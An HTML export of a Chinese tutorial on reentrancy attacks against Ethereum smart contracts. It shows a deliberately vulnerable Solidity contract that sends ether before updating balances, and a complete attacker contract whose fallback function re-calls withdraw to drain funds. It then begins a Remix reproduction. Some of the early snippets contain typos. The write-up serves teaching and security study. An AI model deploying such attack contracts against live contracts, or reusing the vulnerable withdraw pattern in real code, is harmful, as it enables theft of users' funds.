<!DOCTYPE html><html><head>
      <title>ReentryAttack</title>
      <meta charset="utf-8">
      <meta name="viewport" content="width=device-width, initial-scale=1.0">
      
      <link rel="stylesheet" href="file:///c:\Users\&#x5C0F;&#x6829;\.vscode\extensions\shd101wyy.markdown-preview-enhanced-0.6.3\node_modules\@shd101wyy\mume\dependencies\katex\katex.min.css">
      
      
      
      
      
      
      
      
      
      <style>
      /**
 * prism.js Github theme based on GitHub's theme.
 * @author Sam Clarke
 */
code[class*="language-"],
pre[class*="language-"] {
  color: #333;
  background: none;
  font-family: Consolas, "Liberation Mono", Menlo, Courier, monospace;
  text-align: left;
  white-space: pre;
  word-spacing: normal;
  word-break: normal;
  word-wrap: normal;
  line-height: 1.4;

  -moz-tab-size: 8;
  -o-tab-size: 8;
  tab-size: 8;

  -webkit-hyphens: none;
  -moz-hyphens: none;
  -ms-hyphens: none;
  hyphens: none;
}

/* Code blocks */
pre[class*="language-"] {
  padding: .8em;
  overflow: auto;
  /* border: 1px solid #ddd; */
  border-radius: 3px;
  /* background: #fff; */
  background: #f5f5f5;
}

/* Inline code */
:not(pre) > code[class*="language-"] {
  padding: .1em;
  border-radius: .3em;
  white-space: normal;
  background: #f5f5f5;
}

.token.comment,
.token.blockquote {
  color: #969896;
}

.token.cdata {
  color: #183691;
}

.token.doctype,
.token.punctuation,
.token.variable,
.token.macro.property {
  color: #333;
}

.token.operator,
.token.important,
.token.keyword,
.token.rule,
.token.builtin {
  color: #a71d5d;
}

.token.string,
.token.url,
.token.regex,
.token.attr-value {
  color: #183691;
}

.token.property,
.token.number,
.token.boolean,
.token.entity,
.token.atrule,
.token.constant,
.token.symbol,
.token.command,
.token.code {
  color: #0086b3;
}

.token.tag,
.token.selector,
.token.prolog {
  color: #63a35c;
}

.token.function,
.token.namespace,
.token.pseudo-element,
.token.class,
.token.class-name,
.token.pseudo-class,
.token.id,
.token.url-reference .token.variable,
.token.attr-name {
  color: #795da3;
}

.token.entity {
  cursor: help;
}

.token.title,
.token.title .token.punctuation {
  font-weight: bold;
  color: #1d3e81;
}

.token.list {
  color: #ed6a43;
}

.token.inserted {
  background-color: #eaffea;
  color: #55a532;
}

.token.deleted {
  background-color: #ffecec;
  color: #bd2c00;
}

.token.bold {
  font-weight: bold;
}

.token.italic {
  font-style: italic;
}


/* JSON */
.language-json .token.property {
  color: #183691;
}

.language-markup .token.tag .token.punctuation {
  color: #333;
}

/* CSS */
code.language-css,
.language-css .token.function {
  color: #0086b3;
}

/* YAML */
.language-yaml .token.atrule {
  color: #63a35c;
}

code.language-yaml {
  color: #183691;
}

/* Ruby */
.language-ruby .token.function {
  color: #333;
}

/* Markdown */
.language-markdown .token.url {
  color: #795da3;
}

/* Makefile */
.language-makefile .token.symbol {
  color: #795da3;
}

.language-makefile .token.variable {
  color: #183691;
}

.language-makefile .token.builtin {
  color: #0086b3;
}

/* Bash */
.language-bash .token.keyword {
  color: #0086b3;
}

/* highlight */
pre[data-line] {
  position: relative;
  padding: 1em 0 1em 3em;
}
pre[data-line] .line-highlight-wrapper {
  position: absolute;
  top: 0;
  left: 0;
  background-color: transparent;
  display: block;
  width: 100%;
}

pre[data-line] .line-highlight {
  position: absolute;
  left: 0;
  right: 0;
  padding: inherit 0;
  margin-top: 1em;
  background: hsla(24, 20%, 50%,.08);
  background: linear-gradient(to right, hsla(24, 20%, 50%,.1) 70%, hsla(24, 20%, 50%,0));
  pointer-events: none;
  line-height: inherit;
  white-space: pre;
}

pre[data-line] .line-highlight:before, 
pre[data-line] .line-highlight[data-end]:after {
  content: attr(data-start);
  position: absolute;
  top: .4em;
  left: .6em;
  min-width: 1em;
  padding: 0 .5em;
  background-color: hsla(24, 20%, 50%,.4);
  color: hsl(24, 20%, 95%);
  font: bold 65%/1.5 sans-serif;
  text-align: center;
  vertical-align: .3em;
  border-radius: 999px;
  text-shadow: none;
  box-shadow: 0 1px white;
}

pre[data-line] .line-highlight[data-end]:after {
  content: attr(data-end);
  top: auto;
  bottom: .4em;
}html body{font-family:"Helvetica Neue",Helvetica,"Segoe UI",Arial,freesans,sans-serif;font-size:16px;line-height:1.6;color:#333;background-color:#fff;overflow:initial;box-sizing:border-box;word-wrap:break-word}html body>:first-child{margin-top:0}html body h1,html body h2,html body h3,html body h4,html body h5,html body h6{line-height:1.2;margin-top:1em;margin-bottom:16px;color:#000}html body h1{font-size:2.25em;font-weight:300;padding-bottom:.3em}html body h2{font-size:1.75em;font-weight:400;padding-bottom:.3em}html body h3{font-size:1.5em;font-weight:500}html body h4{font-size:1.25em;font-weight:600}html body h5{font-size:1.1em;font-weight:600}html body h6{font-size:1em;font-weight:600}html body h1,html body h2,html body h3,html body h4,html body h5{font-weight:600}html body h5{font-size:1em}html body h6{color:#5c5c5c}html body strong{color:#000}html body del{color:#5c5c5c}html body a:not([href]){color:inherit;text-decoration:none}html body a{color:#08c;text-decoration:none}html body a:hover{color:#00a3f5;text-decoration:none}html body img{max-width:100%}html body>p{margin-top:0;margin-bottom:16px;word-wrap:break-word}html body>ul,html body>ol{margin-bottom:16px}html body ul,html body ol{padding-left:2em}html body ul.no-list,html body ol.no-list{padding:0;list-style-type:none}html body ul ul,html body ul ol,html body ol ol,html body ol ul{margin-top:0;margin-bottom:0}html body li{margin-bottom:0}html body li.task-list-item{list-style:none}html body li>p{margin-top:0;margin-bottom:0}html body .task-list-item-checkbox{margin:0 .2em .25em -1.8em;vertical-align:middle}html body .task-list-item-checkbox:hover{cursor:pointer}html body blockquote{margin:16px 0;font-size:inherit;padding:0 15px;color:#5c5c5c;background-color:#f0f0f0;border-left:4px solid #d6d6d6}html body blockquote>:first-child{margin-top:0}html body blockquote>:last-child{margin-bottom:0}html body hr{height:4px;margin:32px 0;background-color:#d6d6d6;border:0 none}html body table{margin:10px 0 15px 0;border-collapse:collapse;border-spacing:0;display:block;width:100%;overflow:auto;word-break:normal;word-break:keep-all}html body table th{font-weight:bold;color:#000}html body table td,html body table th{border:1px solid #d6d6d6;padding:6px 13px}html body dl{padding:0}html body dl dt{padding:0;margin-top:16px;font-size:1em;font-style:italic;font-weight:bold}html body dl dd{padding:0 16px;margin-bottom:16px}html body code{font-family:Menlo,Monaco,Consolas,'Courier New',monospace;font-size:.85em !important;color:#000;background-color:#f0f0f0;border-radius:3px;padding:.2em 0}html body code::before,html body code::after{letter-spacing:-0.2em;content:"\00a0"}html body pre>code{padding:0;margin:0;font-size:.85em !important;word-break:normal;white-space:pre;background:transparent;border:0}html body .highlight{margin-bottom:16px}html body .highlight pre,html body pre{padding:1em;overflow:auto;font-size:.85em !important;line-height:1.45;border:#d6d6d6;border-radius:3px}html body .highlight pre{margin-bottom:0;word-break:normal}html body pre code,html body pre tt{display:inline;max-width:initial;padding:0;margin:0;overflow:initial;line-height:inherit;word-wrap:normal;background-color:transparent;border:0}html body pre code:before,html body pre tt:before,html body pre code:after,html body pre tt:after{content:normal}html body p,html body blockquote,html body ul,html body ol,html body dl,html body pre{margin-top:0;margin-bottom:16px}html body kbd{color:#000;border:1px solid #d6d6d6;border-bottom:2px solid #c7c7c7;padding:2px 4px;background-color:#f0f0f0;border-radius:3px}@media print{html body{background-color:#fff}html body h1,html body h2,html body h3,html body h4,html body h5,html body h6{color:#000;page-break-after:avoid}html body blockquote{color:#5c5c5c}html body pre{page-break-inside:avoid}html body table{display:table}html body img{display:block;max-width:100%;max-height:100%}html body pre,html body code{word-wrap:break-word;white-space:pre}}.markdown-preview{width:100%;height:100%;box-sizing:border-box}.markdown-preview .pagebreak,.markdown-preview .newpage{page-break-before:always}.markdown-preview pre.line-numbers{position:relative;padding-left:3.8em;counter-reset:linenumber}.markdown-preview pre.line-numbers>code{position:relative}.markdown-preview pre.line-numbers .line-numbers-rows{position:absolute;pointer-events:none;top:1em;font-size:100%;left:0;width:3em;letter-spacing:-1px;border-right:1px solid #999;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none}.markdown-preview pre.line-numbers .line-numbers-rows>span{pointer-events:none;display:block;counter-increment:linenumber}.markdown-preview pre.line-numbers .line-numbers-rows>span:before{content:counter(linenumber);color:#999;display:block;padding-right:.8em;text-align:right}.markdown-preview .mathjax-exps .MathJax_Display{text-align:center !important}.markdown-preview:not([for="preview"]) .code-chunk .btn-group{display:none}.markdown-preview:not([for="preview"]) .code-chunk .status{display:none}.markdown-preview:not([for="preview"]) .code-chunk .output-div{margin-bottom:16px}.scrollbar-style::-webkit-scrollbar{width:8px}.scrollbar-style::-webkit-scrollbar-track{border-radius:10px;background-color:transparent}.scrollbar-style::-webkit-scrollbar-thumb{border-radius:5px;background-color:rgba(150,150,150,0.66);border:4px solid rgba(150,150,150,0.66);background-clip:content-box}html body[for="html-export"]:not([data-presentation-mode]){position:relative;width:100%;height:100%;top:0;left:0;margin:0;padding:0;overflow:auto}html body[for="html-export"]:not([data-presentation-mode]) .markdown-preview{position:relative;top:0}@media screen and (min-width:914px){html body[for="html-export"]:not([data-presentation-mode]) .markdown-preview{padding:2em calc(50% - 457px + 2em)}}@media screen and (max-width:914px){html body[for="html-export"]:not([data-presentation-mode]) .markdown-preview{padding:2em}}@media screen and (max-width:450px){html body[for="html-export"]:not([data-presentation-mode]) .markdown-preview{font-size:14px !important;padding:1em}}@media print{html body[for="html-export"]:not([data-presentation-mode]) #sidebar-toc-btn{display:none}}html body[for="html-export"]:not([data-presentation-mode]) #sidebar-toc-btn{position:fixed;bottom:8px;left:8px;font-size:28px;cursor:pointer;color:inherit;z-index:99;width:32px;text-align:center;opacity:.4}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] #sidebar-toc-btn{opacity:1}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .md-sidebar-toc{position:fixed;top:0;left:0;width:300px;height:100%;padding:32px 0 48px 0;font-size:14px;box-shadow:0 0 4px rgba(150,150,150,0.33);box-sizing:border-box;overflow:auto;background-color:inherit}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .md-sidebar-toc::-webkit-scrollbar{width:8px}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .md-sidebar-toc::-webkit-scrollbar-track{border-radius:10px;background-color:transparent}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .md-sidebar-toc::-webkit-scrollbar-thumb{border-radius:5px;background-color:rgba(150,150,150,0.66);border:4px solid rgba(150,150,150,0.66);background-clip:content-box}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .md-sidebar-toc a{text-decoration:none}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .md-sidebar-toc ul{padding:0 1.6em;margin-top:.8em}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .md-sidebar-toc li{margin-bottom:.8em}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .md-sidebar-toc ul{list-style-type:none}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .markdown-preview{left:300px;width:calc(100% -  300px);padding:2em calc(50% - 457px -  150px);margin:0;box-sizing:border-box}@media screen and (max-width:1274px){html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .markdown-preview{padding:2em}}@media screen and (max-width:450px){html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .markdown-preview{width:100%}}html body[for="html-export"]:not([data-presentation-mode]):not([html-show-sidebar-toc]) .markdown-preview{left:50%;transform:translateX(-50%)}html body[for="html-export"]:not([data-presentation-mode]):not([html-show-sidebar-toc]) .md-sidebar-toc{display:none}
/* Please visit the URL below for more information: */
/*   https://shd101wyy.github.io/markdown-preview-enhanced/#/customize-css */

      </style>
    </head>
    <body for="html-export">
      <div class="mume markdown-preview  ">
      <h1 class="mume-header" id="%E9%87%8D%E5%85%A5%E6%94%BB%E5%87%BB%E5%88%86%E6%9E%90">&#x91CD;&#x5165;&#x653B;&#x51FB;&#x5206;&#x6790;</h1>

<hr>
<pre class="language-text">                                                                                                author&#xFF1A;&#x7518;&#x8D5E;&#x6829;
</pre>
<h2 class="mume-header" id="%E6%BC%8F%E6%B4%9E%E6%A6%82%E8%BF%B0">&#x6F0F;&#x6D1E;&#x6982;&#x8FF0;</h2>

<p>&#x5728;&#x4EE5;&#x592A;&#x574A;&#x4E2D;&#xFF0C;&#x667A;&#x80FD;&#x5408;&#x7EA6;&#x80FD;&#x591F;&#x8C03;&#x7528;&#x5176;&#x4ED6;&#x5916;&#x90E8;&#x5408;&#x7EA6;&#x7684;&#x4EE3;&#x7801;&#xFF0C;&#x7531;&#x4E8E;&#x667A;&#x80FD;&#x5408;&#x7EA6;&#x53EF;&#x4EE5;&#x8C03;&#x7528;&#x5916;&#x90E8;&#x5408;&#x7EA6;&#x6216;&#x8005;&#x53D1;&#x9001;&#x4EE5;&#x592A;&#x5E01;&#xFF0C;&#x8FD9;&#x4E9B;&#x64CD;&#x4F5C;&#x9700;&#x8981;&#x5408;&#x7EA6;&#x63D0;&#x4EA4;&#x5916;&#x90E8;&#x7684;&#x8C03;&#x7528;&#xFF0C;&#x6240;&#x4EE5;&#x8FD9;&#x4E9B;&#x5408;&#x7EA6;&#x5916;&#x90E8;&#x7684;&#x8C03;&#x7528;&#x5C31;&#x53EF;&#x4EE5;&#x88AB;&#x653B;&#x51FB;&#x8005;&#x5229;&#x7528;&#x9020;&#x6210;&#x653B;&#x51FB;&#x52AB;&#x6301;&#xFF0C;&#x4F7F;&#x5F97;&#x88AB;&#x653B;&#x51FB;&#x5408;&#x7EA6;&#x5728;&#x4EFB;&#x610F;&#x4F4D;&#x7F6E;&#x91CD;&#x65B0;&#x6267;&#x884C;(&#x56DE;&#x8C03;)&#xFF0C;&#x7ED5;&#x8FC7;&#x539F;&#x4EE3;&#x7801;&#x4E2D;&#x7684;&#x9650;&#x5236;&#x6761;&#x4EF6;&#xFF0C;&#x4ECE;&#x800C;&#x53D1;&#x751F;&#x91CD;&#x5165;&#x653B;&#x51FB;&#x3002;&#x91CD;&#x5165;&#x653B;&#x51FB;&#x672C;&#x8D28;&#x4E0A;&#x4E0E;&#x7F16;&#x7A0B;&#x91CC;&#x7684;&#x9012;&#x5F52;&#x8C03;&#x7528;&#x7C7B;&#x4F3C;&#xFF0C;&#x6240;&#x4EE5;&#x5F53;&#x5408;&#x7EA6;&#x5C06;&#x4EE5;&#x592A;&#x5E01;&#x53D1;&#x9001;&#x5230;&#x672A;&#x77E5;&#x5730;&#x5740;&#x65F6;&#x5C31;&#x53EF;&#x80FD;&#x4F1A;&#x53D1;&#x751F;&#x3002;</p>
<ul>
<li><strong>&#x53D1;&#x751F;&#x6761;&#x4EF6;</strong>
<ol>
<li>&#x8C03;&#x7528;&#x4E86;&#x5916;&#x90E8;&#x7684;&#x5408;&#x7EA6;&#x4E14;&#x8BE5;&#x5408;&#x7EA6;&#x662F;&#x4E0D;&#x5B89;&#x5168;&#x7684;</li>
<li>&#x5916;&#x90E8;&#x5408;&#x7EA6;&#x7684;&#x51FD;&#x6570;&#x8C03;&#x7528;&#x65E9;&#x4E8E;&#x72B6;&#x6001;&#x53D8;&#x91CF;&#x7684;&#x4FEE;&#x6539;</li>
</ol>
</li>
</ul>
<p>&#x63A5;&#x4E0B;&#x6765;&#x7ED9;&#x5927;&#x5BB6;&#x5C55;&#x793A;&#x7684;&#x662F;&#x4E00;&#x4E2A;&#x6700;&#x7B80;&#x5355;&#x7684;&#x63D0;&#x6B3E;&#x51FD;&#x6570;&#xFF1A;</p>
<pre data-role="codeBlock" data-info class="language-"><code>function withdraw(){
  require(msg.sender,call.value(balances[msg.sender])());
  balances[msg.sender]=0;
}
</code></pre><p>&#x8FD9;&#x79CD;&#x51FD;&#x6570;&#x5927;&#x591A;&#x5B58;&#x5728;&#x4E8E;&#x94B1;&#x5305;&#x3001;&#x53BB;&#x4E2D;&#x5FC3;&#x5316;&#x4EA4;&#x6613;&#x6240;&#x4E2D;&#xFF0C;&#x76EE;&#x7684;&#x662F;&#x4E3A;&#x4E86;&#x8BA9;&#x7528;&#x6237;&#x63D0;&#x6B3E;&#xFF0C;&#x5C06;&#x5408;&#x7EA6;&#x4E2D;&#x7684;&#x4EE3;&#x5E01;&#x8F6C;&#x6362;&#x6210;&#x901A;&#x7528;&#x7684;&#x4EE5;&#x592A;&#x5E01;&#x3002;<br></p>
<h2 class="mume-header" id="%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90">&#x6F0F;&#x6D1E;&#x5206;&#x6790;</h2>

<pre class="language-text">&#x5728;&#x8FDB;&#x5165;&#x5206;&#x6790;&#x4E4B;&#x524D;&#xFF0C;&#x5148;&#x4ECB;&#x7ECD;&#x51E0;&#x4E2A;&#x57FA;&#x7840;&#x77E5;&#x8BC6;
</pre>
<ul>
<li>
<p>&#x4EE5;&#x592A;&#x574A;&#x5E38;&#x7528;&#x7684;&#x8F6C;&#x8D26;&#x7684;&#x65B9;&#x6CD5;</p>
<ol>
<li>transfer()&#xFF1A;&#x53EA;&#x4F1A;&#x53D1;&#x9001; 2300 gas &#x8FDB;&#x884C;&#x8C03;&#x7528;&#xFF0C;&#x5F53;&#x53D1;&#x9001;&#x5931;&#x8D25;&#x65F6;&#x4F1A;&#x901A;&#x8FC7; throw &#x6765;&#x8FDB;&#x884C;&#x56DE;&#x6EDA;&#x64CD;&#x4F5C;&#xFF0C;&#x4ECE;&#x800C;&#x9632;&#x6B62;&#x4E86;&#x91CD;&#x5165;&#x653B;&#x51FB;&#x3002;</li>
<li>send()&#xFF1A;&#x53EA;&#x4F1A;&#x53D1;&#x9001; 2300 gas &#x8FDB;&#x884C;&#x8C03;&#x7528;&#xFF0C;&#x5F53;&#x53D1;&#x9001;&#x5931;&#x8D25;&#x65F6;&#x4F1A;&#x8FD4;&#x56DE;&#x5E03;&#x5C14;&#x503C; false&#xFF0C;&#x4ECE;&#x800C;&#x9632;&#x6B62;&#x4E86;&#x91CD;&#x5165;&#x653B;&#x51FB;&#x3002;</li>
<li>gas().call.vale()()&#xFF1A;&#x5728;&#x8C03;&#x7528;&#x65F6;&#x4F1A;&#x53D1;&#x9001;&#x6240;&#x6709;&#x7684; gas&#xFF0C;&#x5F53;&#x53D1;&#x9001;&#x5931;&#x8D25;&#x65F6;&#x4F1A;&#x8FD4;&#x56DE;&#x5E03;&#x5C14;&#x503C; false&#xFF0C;&#x4E0D;&#x80FD;&#x6709;&#x6548;&#x7684;&#x9632;&#x6B62;&#x91CD;&#x5165;&#x653B;&#x51FB;&#x3002;</li>
</ol>
</li>
<li>
<p>fallback&#x51FD;&#x6570;<br>
&#x56DE;&#x9000;&#x51FD;&#x6570; (fallback function)&#xFF1A;&#x56DE;&#x9000;&#x51FD;&#x6570;&#x662F;&#x6BCF;&#x4E2A;&#x5408;&#x7EA6;&#x4E2D;&#x6709;&#x4E14;&#x4EC5;&#x6709;&#x4E00;&#x4E2A;&#x6CA1;&#x6709;&#x540D;&#x5B57;&#x7684;&#x51FD;&#x6570;&#xFF0C;&#x5E76;&#x4E14;&#x8BE5;&#x51FD;&#x6570;&#x65E0;&#x53C2;&#x6570;&#xFF0C;&#x65E0;&#x8FD4;&#x56DE;&#x503C;&#xFF0C;&#x5982;&#x4E0B;&#x6240;&#x793A;&#xFF1A;</p>
<pre data-role="codeBlock" data-info class="language-"><code>function() public payable{
    ...
}
</code></pre><p>&#x56DE;&#x9000;&#x51FD;&#x6570;&#x5728;&#x4EE5;&#x4E0B;&#x51E0;&#x79CD;&#x60C5;&#x51B5;&#x4E2D;&#x88AB;&#x6267;&#x884C;&#xFF1A;</p>
<ol>
<li>&#x8C03;&#x7528;&#x5408;&#x7EA6;&#x65F6;&#x6CA1;&#x6709;&#x5339;&#x914D;&#x5230;&#x4EFB;&#x4F55;&#x4E00;&#x4E2A;&#x51FD;&#x6570;</li>
<li>&#x6CA1;&#x6709;&#x4F20;&#x6570;&#x636E;</li>
<li>&#x667A;&#x80FD;&#x5408;&#x7EA6;&#x6536;&#x5230;&#x4EE5;&#x592A;&#x5E01;&#xFF08;&#x4E3A;&#x4E86;&#x63A5;&#x53D7;&#x4EE5;&#x592A;&#x5E01;&#xFF0C;fallback &#x51FD;&#x6570;&#x5FC5;&#x88AB;&#x6807;&#x8BB0;&#x4E3A; payable&#xFF09;</li>
</ol>
</li>
<li>
<p>&#x6F0F;&#x6D1E;<br>
&#x901A;&#x8FC7;&#x6211;&#x4EEC;&#x5BF9;fallback&#x51FD;&#x6570;&#x7684;&#x4E86;&#x89E3;&#x3002;<br>
&#x5982;&#x679C;&#x6211;&#x4EEC;&#x6784;&#x9020;&#x4E00;&#x4E2A; fallback &#x51FD;&#x6570;&#xFF0C;&#x51FD;&#x6570;&#x91CC;&#x9762;&#x4E5F;&#x8C03;&#x7528;&#x5BF9;&#x65B9;&#x7684; withdraw &#x51FD;&#x6570;&#x7684;&#x8BDD;&#xFF0C;&#x90A3;&#x5C06;&#x4F1A;&#x4EA7;&#x751F;&#x4E00;&#x4E2A;&#x5FAA;&#x73AF;&#x8C03;&#x7528;&#x8F6C;&#x8D26;&#x529F;&#x80FD;&#xFF0C;&#x5B58;&#x5728;&#x6F0F;&#x6D1E;&#x7684;&#x5408;&#x7EA6;&#x4F1A;&#x4E0D;&#x65AD;&#x5411;&#x653B;&#x51FB;&#x8005;&#x5408;&#x7EA6;&#x8F6C;&#x8D26;&#xFF0C;&#x7EC8;&#x6B62;&#x5FAA;&#x73AF;&#x7ED3;&#x675F;&#xFF08;&#x4EE5;&#x592A;&#x574A; gas &#x6709;&#x4E0A;&#x9650;&#xFF09;<br>
<img src="images/Reenter1.png" alt="&#x653B;&#x51FB;&#x539F;&#x7406;"><br>
&#x6211;&#x4EEC;&#x5148;&#x6765;&#x770B;&#x4E00;&#x6BB5;&#x6BD4;&#x8F83;&#x5178;&#x578B;&#x7684;&#x6709;&#x91CD;&#x5165;&#x6F0F;&#x6D1E;&#x7684;&#x5408;&#x7EA6;&#xFF1A;</p>
<pre data-role="codeBlock" data-info class="language-"><code>pragma solidity ^0.4.19;

contract Reentrance{
    address _owner;
    mapping (address =&gt; uint256) balances;

    function Reentrance(){
        _owner = msg.sender;
    }

    function withdraw(uint256 amount) public payable{
        require(balances[msg.sender] &gt;= amount);
        require(this.balance &gt;= amount);
        // &#x53D1;&#x9001;&#x4EE5;&#x592A;
        msg.sender.call.value(amount)();
        // &#x72B6;&#x6001;&#x53D8;&#x91CF;&#x4FEE;&#x6539;
        balances[msg.sender] -= amount;
    }

    function deposit() public payable{
        balances[msg.sender] += msg.value;
    }

    function balanceOf(address adre)constant returns(uint256){
        return balances[adre];
    }

    function wallet() constant returns(uint256 result){
        return this.balance;
    }


}
</code></pre><p>&#x6211;&#x4EEC;&#x6765;&#x770B;&#x8FD9;&#x4E2A;&#x5408;&#x7EA6;&#x7684; withdraw &#x51FD;&#x6570;&#xFF0C;&#x8FD9;&#x4E2A;&#x51FD;&#x6570;&#x4E2D;&#x7684;&#x8F6C;&#x8D26;&#x64CD;&#x4F5C;&#x6709;&#x4E00;&#x4E2A;&#x5916;&#x90E8;&#x8C03;&#x7528;&#xFF08;msg.sender.call.value(amount)()&#xFF09;&#xFF0C;&#x6240;&#x4EE5;&#x6211;&#x4EEC;&#x5C31;&#x53EF;&#x4EE5;&#x8BA4;&#x4E3A;&#x8FD9;&#x4E2A;&#x5408;&#x7EA6;&#x662F;&#x53EF;&#x80FD;&#x6709;&#x91CD;&#x5165;&#x6F0F;&#x6D1E;&#x7684;&#xFF0C;&#x4F46;&#x662F;&#x5177;&#x4F53;&#x80FD;&#x5426;&#x4EA7;&#x751F;&#x5371;&#x5BB3;&#x8FD8;&#x9700;&#x8981;&#x66F4;&#x6DF1;&#x5165;&#x7684;&#x5206;&#x6790;&#xFF1A;</p>
<ul>
<li>&#x653B;&#x51FB;&#x8005;&#x601D;&#x8DEF;&#xFF1A;
<blockquote>
<ol>
<li>&#x6240;&#x6709;&#x7684;&#x5916;&#x90E8;&#x8C03;&#x7528;&#x90FD;&#x662F;&#x4E0D;&#x5B89;&#x5168;&#x7684;&#x4E14;&#x5408;&#x7EA6;&#x5728;&#x63A5;&#x6536;&#x4EE5;&#x592A;&#x7684;&#x65F6;&#x5019;&#x4F1A;&#x89E6;&#x53D1; fallback &#x51FD;&#x6570;&#x6267;&#x884C;&#x76F8;&#x5E94;&#x7684;&#x903B;&#x8F91;&#xFF0C;&#x8FD9;&#x662F;&#x4E00;&#x79CD;&#x9690;&#x85CF;&#x7684;&#x5916;&#x90E8;&#x8C03;&#x7528;&#xFF0C;&#x8FD9;&#x79CD;&#x9690;&#x85CF;&#x7684;&#x5916;&#x90E8;&#x8C03;&#x7528;&#x662F;&#x5426;&#x4F1A;&#x9020;&#x6210;&#x5371;&#x5BB3;&#x5462;&#xFF1F;</li>
<li>&#x6211;&#x4EEC;&#x53EF;&#x4EE5;&#x770B;&#x5230;&#x5728; withdraw &#x51FD;&#x6570;&#x4E2D;&#x662F;&#x5148;&#x6267;&#x884C;&#x5916;&#x90E8;&#x8C03;&#x7528;&#x8FDB;&#x884C;&#x8F6C;&#x8D26;&#x540E;&#x624D;&#x4FEE;&#x6539;&#x7528;&#x6237;&#x4F59;&#x989D;&#x72B6;&#x6001;&#x53D8;&#x91CF;&#x7684;&#xFF0C;&#x90A3;&#x6211;&#x4EEC;&#x53EF;&#x4E0D;&#x53EF;&#x4EE5;&#x5728;&#x8F6C;&#x8D26;&#x5916;&#x90E8;&#x8C03;&#x7528;&#x7684;&#x65F6;&#x5019;&#x6784;&#x9020;&#x4E00;&#x4E2A;&#x6076;&#x610F;&#x7684;&#x903B;&#x8F91;&#x5408;&#x7EA6;&#x5728;&#x5408;&#x7EA6;&#x6267;&#x884C; balance[msg.sender] -= amount &#x4E4B;&#x524D;&#x4E00;&#x76F4;&#x5FAA;&#x73AF;&#x8C03;&#x7528; withdraw &#x51FD;&#x6570;&#x4E00;&#x76F4;&#x63D0;&#x5E01;&#x4ECE;&#x800C;&#x5C06;&#x5408;&#x7EA6;&#x8D26;&#x6237;&#x6E05;&#x7A7A;&#x5462;&#xFF1F;</li>
</ol>
</blockquote>
</li>
<li>&#x653B;&#x51FB;&#x5408;&#x7EA6;&#xFF1A;</li>
</ul>
<pre data-role="codeBlock" data-info class="language-"><code>pragma solidity ^0.4.19;
import&quot;./Reentrance.sol&quot;;

contract ReentranceAttack{
    Reentrance re;
    function ReentranceAttack(address _target) public payable{
        re = Reentrance(_target);
    }

    function wallet()view returns(uint256){
        return this.balance;
    }

    function deposit()public payable {
        re.deposit.value(msg.value)();
    }

    function attack(){
        re.withdraw(1);
    }
    function () public payable {
        if (address(re).balance &gt;= 1 ether){
            re.withdraw(1);
        }
    }

}
</code></pre><ul>
<li>&#x653B;&#x51FB;&#x539F;&#x7406;&#xFF1A;<br>
&#x7531;&#x4E8E;&#x53D7;&#x5BB3;&#x8005;&#x5408;&#x7EA6;withdraw&#x51FD;&#x6570;&#x4F7F;&#x7528;call&#x51FD;&#x6570;&#x8F6C;&#x8D26;&#xFF0C;&#x4F1A;&#x9644;&#x52A0;&quot;&#x6240;&#x6709;&#x53EF;&#x7528;gas&quot;&#xFF0C;&#x5E76;&#x89E6;&#x53D1;msg.sender&#x7684;fallback&#x51FD;&#x6570;&#x3002;fallback &#x51FD;&#x6570;&#x518D;&#x6B21;&#x8C03;&#x7528;withdraw&#x51FD;&#x6570;&#x5957;&#x5229;&#xFF0C;&#x7531;&#x4E8E;withdraw&#x51FD;&#x6570;&#x6700;&#x540E;&#x4E00;&#x6B65;&#x624D;&#x51CF;&#x53BB;msg.sender&#x5BF9;&#x5E94;&#x7684;&#x4F59;&#x989D;&#x5E76;&#x8BB0;&#x5F55;&#x5BFC;&#x81F4;&#x9012;&#x5F52;&#x8C03;&#x7528;withdraw&#x51FD;&#x6570;require&#x5224;&#x65AD;&#x90FD;&#x80FD;&#x901A;&#x8FC7;&#x3002;&#x76F4;&#x5230;&#x5408;&#x7EA6;&#x4E2D;&#x6CA1;&#x6709;&#x53EF;&#x7528;&#x4F59;&#x989D;&#x4E3A;&#x6B62;&#x3002;<br>
&#x7C7B;&#x4F3C;&#x4E8E;&#x5BF9;&#x653B;&#x51FB;&#x8005;fallback&#x51FD;&#x6570;&#x7684;&#x9012;&#x5F52;&#x8C03;&#x7528;</li>
</ul>
</li>
</ul>
<h2 class="mume-header" id="%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0">&#x6F0F;&#x6D1E;&#x590D;&#x73B0;</h2>

<p>&#x9996;&#x5148;&#x7528;&#x8D26;&#x6237;(<code>0x5B38Da6a701c568545dCfcB03FcB875f56beddC4</code>)&#x6A21;&#x62DF;&#x53D7;&#x5BB3;&#x8005;&#xFF0C;&#x70B9;&#x51FB;depoly&#x5F00;&#x59CB;&#x90E8;&#x7F72;&#x3002;<br>
<img src="images/Reenter2.png" alt><br>
&#x7136;&#x540E;&#x5C06;Value&#x6539;&#x4E3A;5&#xFF0C;&#x5355;&#x4F4D;&#x6539;&#x4E3A;ether&#x3002;&#x70B9;&#x51FB;deposit&#x65B9;&#x6CD5;<br>
<img src="images/Reenter3.png" alt><br>
&#x67E5;&#x770B;&#x5F53;&#x524D;&#x8D26;&#x6237;&#x4F59;&#x989D;&#x4E3A;5ether&#xFF0C;&#x5B58;&#x6B3E;&#x6210;&#x529F;<br>
<img src="images/Reenter4.png" alt><br>
